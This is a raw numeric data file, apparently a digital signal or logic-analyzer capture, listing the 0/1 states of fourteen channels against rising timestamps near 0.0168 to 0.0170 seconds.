1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758336e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758360e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758484e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758508e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758560e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758708e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758736e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758760e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758908e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758936e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758960e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759108e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759160e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759308e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759336e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759360e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759460e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759508e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759560e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759708e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759736e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759760e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759908e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759936e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6759960e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6759988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6760012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6760036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6760060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6760084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6760108e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6760136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6760160e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6760188e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6884260e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,1.6884444e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.6884468e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,1.6884484e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.6884508e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,1.6884828e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.6884852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.6884860e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.6884876e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.6884904e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.6884928e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.6884956e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.6884980e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.6885004e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.6885028e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.6885052e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.6885076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885128e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885152e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885180e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885204e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885304e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885308e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6885356e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885380e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885404e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885504e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885528e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885580e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885604e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885608e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6885628e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885652e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6885676e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885704e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6885728e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885756e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6885780e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885812e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6885904e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6885928e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6885932e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6885980e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886004e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886012e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886076e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886084e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886104e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886128e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886156e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886180e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886204e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886304e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886328e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886356e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886380e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886404e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886452e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886476e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886504e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886528e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886556e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886580e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,1.6886584e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886604e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886704e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886728e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886756e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886780e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6886876e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886904e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886908e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6886956e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6886980e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6886988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887028e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887052e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887076e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887104e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887128e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6887156e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6887204e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6887228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887304e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6887308e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6887328e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6887356e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6887380e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6887404e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6887428e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6887452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887460e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887504e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887528e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887556e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887580e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887604e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887704e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887728e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887756e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887780e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887904e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887928e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6887952e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6887980e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888004e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888076e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888084e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888128e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888156e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,1.6888160e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888164e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888180e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888204e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888304e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888356e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888380e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888384e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888404e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888428e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888452e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888476e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888504e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888528e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888552e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888580e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,1.6888584e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888628e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888652e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888676e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888704e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888708e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888728e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888756e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888804e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888828e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888852e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888876e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6888900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6888928e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,1.6888932e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888936e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6888956e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6888980e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889004e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889104e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889128e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889152e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889180e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889204e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889328e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889356e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889380e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889404e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889476e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889504e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889508e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6889528e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889556e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6889580e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889604e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6889628e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889652e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6889676e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889704e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889708e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889756e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889780e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6889876e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6889904e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889908e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6889928e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6889956e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6889980e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6890000e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6890028e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6890052e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6890076e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6890100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890108e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890152e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890176e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890376e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890800e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890924e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6890948e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6890976e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891000e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891124e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891148e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891176e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891376e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6891700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.6891724e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6891732e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7016164e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7016380e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,1.7016412e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7016436e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,1.7016744e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7016768e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,1,1.7016772e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.7016776e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.7016796e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.7016820e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.7016844e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.7016868e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.7016892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.7016916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.7016944e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.7016968e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.7016992e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7016996e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017020e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017044e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017068e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017092e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017116e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017144e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017168e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017196e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.7017220e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017224e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7017268e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017292e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017344e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017368e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017420e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017440e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017448e-02 